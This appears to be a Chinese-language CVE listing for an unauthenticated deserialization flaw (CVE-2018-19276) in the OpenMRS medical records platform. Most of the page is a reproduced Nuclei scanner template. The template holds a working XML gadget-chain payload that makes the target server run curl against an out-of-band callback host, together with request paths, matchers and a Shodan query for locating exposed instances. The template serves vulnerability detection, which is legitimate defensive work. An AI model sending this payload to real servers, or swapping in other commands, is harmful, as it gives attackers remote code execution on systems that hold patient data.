CVE-2018-19276: OpenMRS Platform < 2.24.0 - Insecure Object Deserialization

日期: 2025-08-01 | 影响软件: OpenMRS Platform | POC: 已公开

漏洞描述

OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.

PoC代码[已公开]

id: CVE-2018-19276

info:
  name: OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
  author: DhiyaneshDK
  severity: critical
  description: |
    OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
  reference:
    - http://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.html
    - https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19276
    cwe-id: CWE-502
    epss-score: 0.91891
    epss-percentile: 0.99682
    cpe: cpe:2.3:a:openmrs:openmrs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: openmrs
    product: openmrs
    shodan-query: html:"OpenMRS"
  tags: cve,cve20218,openmrs,deserialization,rce

http:
  - raw:
      - |
        POST {{path}}/ws/rest/v1/xxxxxx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <map>
          <entry>
            <groovy.util.Expando>
              <expandoProperties>
                <entry>
                  <string>hashCode</string>
                  <org.codehaus.groovy.runtime.MethodClosure>
                    <delegate class="java.lang.ProcessBuilder">
                      <command>
                        <string>curl</string><string>{{interactsh-url}}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </delegate>
                    <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
                    <resolveStrategy>0</resolveStrategy>
                    <directive>0</directive>
                    <parameterTypes/>
                    <maximumNumberOfParameters>0</maximumNumberOfParameters>
                    <method>start</method>
                  </org.codehaus.groovy.runtime.MethodClosure>
                </entry>
              </expandoProperties>
            </groovy.util.Expando>
            <int>1337</int>
          </entry>
        </map>

    payloads:
      path:
        - ""
        - "/openmrs"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "message\":")'
        condition: and
# digest: 4b0a00483046022100fd7ee647c6c98089198d07d5e47a26af502958878d84a3b5899c9b7c1fc23af0022100c982a4737a52360a5cf39a8138be40ce8921935d0bb88c37c238173edf3c87d6:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19276.yaml